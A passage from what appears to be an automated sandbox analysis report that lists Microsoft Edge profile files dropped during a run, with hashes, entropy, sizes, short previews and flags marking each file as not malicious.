                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\b0a9d8af-d146-47bc-a45c-1b360a40d0aa.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):426
                                                                                                                                                                                                                  Entropy (8bit):5.2352141869997455
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:7o7Q+vVaYebvqBZFUt8OogGKW/+OovQV5OaYebvqBaJ:7o75VaYebvyg8OogGKWovSOaYebvL
                                                                                                                                                                                                                  MD5:AAD391048F97565915130968F792479C
                                                                                                                                                                                                                  SHA1:F5FA464D5230CEE6B2D60829E97F4A1070F885F2
                                                                                                                                                                                                                  SHA-256:1304E082C674E4EF00590B7DD3C9DFD22595AB689AD7367983E3A2003F5550B2
                                                                                                                                                                                                                  SHA-512:74EED47AF6C3EEB1B427FBAA54AB465FB0E3A451DB50B36F4F428270E4B7AC4BDC6C27C5823C8BA955AE72313C234D7A296BEA9C7C3968FB27FF64797E40FB3B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:28.735 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/18-15:06:28.736 1eec Recovering log #3.2024/12/18-15:06:28.739 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):426
                                                                                                                                                                                                                  Entropy (8bit):5.2352141869997455
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:7o7Q+vVaYebvqBZFUt8OogGKW/+OovQV5OaYebvqBaJ:7o75VaYebvyg8OogGKWovSOaYebvL
                                                                                                                                                                                                                  MD5:AAD391048F97565915130968F792479C
                                                                                                                                                                                                                  SHA1:F5FA464D5230CEE6B2D60829E97F4A1070F885F2
                                                                                                                                                                                                                  SHA-256:1304E082C674E4EF00590B7DD3C9DFD22595AB689AD7367983E3A2003F5550B2
                                                                                                                                                                                                                  SHA-512:74EED47AF6C3EEB1B427FBAA54AB465FB0E3A451DB50B36F4F428270E4B7AC4BDC6C27C5823C8BA955AE72313C234D7A296BEA9C7C3968FB27FF64797E40FB3B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:28.735 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/18-15:06:28.736 1eec Recovering log #3.2024/12/18-15:06:28.739 1eec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):332
                                                                                                                                                                                                                  Entropy (8bit):5.209864413295422
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQKuljyq2PN723oH+TcwtpIFUt8OPQx011Zmw+OPQx0jRkwON723oH+Tcwta/Wd:7oZyvVaYebmFUt8Ooa/+OoyR5OaYebaQ
                                                                                                                                                                                                                  MD5:7797CA36B94414FD67F8FA8CBE93E5FF
                                                                                                                                                                                                                  SHA1:1ED93316AE82AA8D0BC584B106BD7B6D6E1962FD
                                                                                                                                                                                                                  SHA-256:FBBF2686368E90BC75CDF77B7FD887DD36BD44B1F9D9EEC7F8FB114A179EF427
                                                                                                                                                                                                                  SHA-512:8D150DB85D59ECF4E6B6EE82AE6FC7DA95060B6B2DD1BAECD856E19177E5F47E7698DE0E13DE27EE3B4FD43BF894744B12C9C7144A7243C3CFEF6BDB30DBFF65
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.287 1e70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/18-15:06:08.479 1e70 Recovering log #3.2024/12/18-15:06:08.479 1e70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):332
                                                                                                                                                                                                                  Entropy (8bit):5.209864413295422
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQKuljyq2PN723oH+TcwtpIFUt8OPQx011Zmw+OPQx0jRkwON723oH+Tcwta/Wd:7oZyvVaYebmFUt8Ooa/+OoyR5OaYebaQ
                                                                                                                                                                                                                  MD5:7797CA36B94414FD67F8FA8CBE93E5FF
                                                                                                                                                                                                                  SHA1:1ED93316AE82AA8D0BC584B106BD7B6D6E1962FD
                                                                                                                                                                                                                  SHA-256:FBBF2686368E90BC75CDF77B7FD887DD36BD44B1F9D9EEC7F8FB114A179EF427
                                                                                                                                                                                                                  SHA-512:8D150DB85D59ECF4E6B6EE82AE6FC7DA95060B6B2DD1BAECD856E19177E5F47E7698DE0E13DE27EE3B4FD43BF894744B12C9C7144A7243C3CFEF6BDB30DBFF65
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:08.287 1e70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/18-15:06:08.479 1e70 Recovering log #3.2024/12/18-15:06:08.479 1e70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):131072
                                                                                                                                                                                                                  Entropy (8bit):0.0032209707218004476
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:ImtVuXhLOOlSl1:IiVux
                                                                                                                                                                                                                  MD5:AF7F821DDDEE6956B3DFBF0C2F4220AE
                                                                                                                                                                                                                  SHA1:F3A08F790A5E546166241635F3B4B7BC515CAF05
                                                                                                                                                                                                                  SHA-256:C366F8D1C0EA5C44FA70D592F8A7BE7116752694E484B9958893B4E615FADBA0
                                                                                                                                                                                                                  SHA-512:5531BC37E3029ADE3B3298372EB799B4B84FE555C395C32F9FC8FECB39080FE97DBAA2838C9E65BBC2C1EB1A3073720F28B7CF60D20D50A79B48F4DBC553E9F5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:VLnk.....?........A..Z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                  Entropy (8bit):1.2675020022946544
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:L/2qOB1nxCkMQSA1LyKOMq+8iP5GDHP/0jMVumuw:Kq+n0JQ91LyKOMq+8iP5GLP/0pw
                                                                                                                                                                                                                  MD5:54001ECAD973EB9FA2B91AD75B1BECDD
                                                                                                                                                                                                                  SHA1:1E6E8166B4C95832ADE66580D41C59BA9B0D998E
                                                                                                                                                                                                                  SHA-256:BFD521EA2DB186407AA0969533192B03E16B86BF8508A677FA9C24DC1F32F6A4
                                                                                                                                                                                                                  SHA-512:BBB0C925A602B371FCC2FB30A9F4D04C909A31BF6D109165D5720E977691760EA9955CC82529B280533E80840772B1FF4ED45AEB5C5765272B672D01204548E6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                  Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                  MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                  SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                  SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                                  SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                  MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                  SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                  SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                  SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\dc27c72c-ce6f-422b-b9f4-5ef323cda427.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12933
                                                                                                                                                                                                                  Entropy (8bit):5.270978250490859
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFJ99QTryDigabatSuyAsa0JaFvrEkL1ikurx3G88bV+FiAn3/PrYJ:stFPGKSu7sa0JCDNL1Ar+bGiM3w
                                                                                                                                                                                                                  MD5:2ED03CA3BBC6B1FC5E1B9233AC95ECF2
                                                                                                                                                                                                                  SHA1:65BB88798D81FE0D36533C886F443DB76FD362C8
                                                                                                                                                                                                                  SHA-256:B887EC53E5B20C0264289FFD1854AD19BDF81AEE1A0E8505C6E2D3589AEB8CD9
                                                                                                                                                                                                                  SHA-512:F0B51389921BD5E74077A1A17B29C7A08B31D062B6C9DA9E1D78D5D9D45BA7535270C8F875D767EF22D9EEA23CA33A88655F25B388A74CBE901907C91147EF3B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379025969301478","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fc6d18df-e065-42c7-8ddc-98fe21d25ca2.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fe47c2ba-1b95-4340-b40a-45bca09cdac2.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12769
                                                                                                                                                                                                                  Entropy (8bit):5.273147156902515
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFJ99QTryDigabatSuyAsa0JaFvrEkL1ikurx3G88bV+FiAxU/PrYJ:stFPGKSu7sa0JCDNL1Ar+bGiPw
                                                                                                                                                                                                                  MD5:E77E11970BEB6695C4D625D5C1971D6A
                                                                                                                                                                                                                  SHA1:7A07A5F63CAF0A5973E470F83661219C312CEC50
                                                                                                                                                                                                                  SHA-256:8BE3675D2439972E2EBE9292A7E3E281E1B97109619CF10348364F3265083B33
                                                                                                                                                                                                                  SHA-512:56EAD1C12575AB4AF079FD16403B763E0CD4FD6CEC8DFF18E804B5126308B2DDD34A2B3EB23AF5A108554EE9B90F65558D72164B3AF9D9EAFF39D172EC66C9D9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379025969301478","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                  Entropy (8bit):0.049424530376406366
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:Gd0ddi8gd0ddi8CL9XCChslotGLNl0ml/XoQDeX:zddHgiddH6pEjVl/XoQ
                                                                                                                                                                                                                  MD5:A364C70716DAB97A286A97ECB635F581
                                                                                                                                                                                                                  SHA1:49202B67B6224CF97962C1D475B27F447CC165A2
                                                                                                                                                                                                                  SHA-256:385C027302FE4F0D60A58C6908C242124B3BB4F8FF63880F05CCF1443EA911B2
                                                                                                                                                                                                                  SHA-512:BAD7427D21D2E8F1A40D7CCA53508B05F07626C5BC37987BE905F01DA5B080692A3F02A758C8496B3C5424B8E0DF5D69A30CD39D393000E571E7CE71EC9B1888
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..-.......................FVN...$J...V..n.c..mv=..-.......................FVN...$J...V..n.c..mv=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):694
                                                                                                                                                                                                                  Entropy (8bit):3.558824786692725
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuKllGIs8u:pHay8lZc
                                                                                                                                                                                                                  MD5:425A93FEFB66D017C6AE9B8CFCBF96F1
                                                                                                                                                                                                                  SHA1:151381A4AEF750D769F342BFD589710F453F9F7F
                                                                                                                                                                                                                  SHA-256:412F844B5C2F6E865D8F3E03C78FF465ADD9EABFF87EE7479673D33BCCBB1155
                                                                                                                                                                                                                  SHA-512:D2F74AE5A05D2CEB6D2CA15FDD7B697125EA109123BCE01D0C7606E3846F701AB35AA526D58557D9E6ACF295C5EF6DB7B2142A80EB8969FE8383EA3E0427A5F2
                                                                                                                                                                                                                  Malicious:false
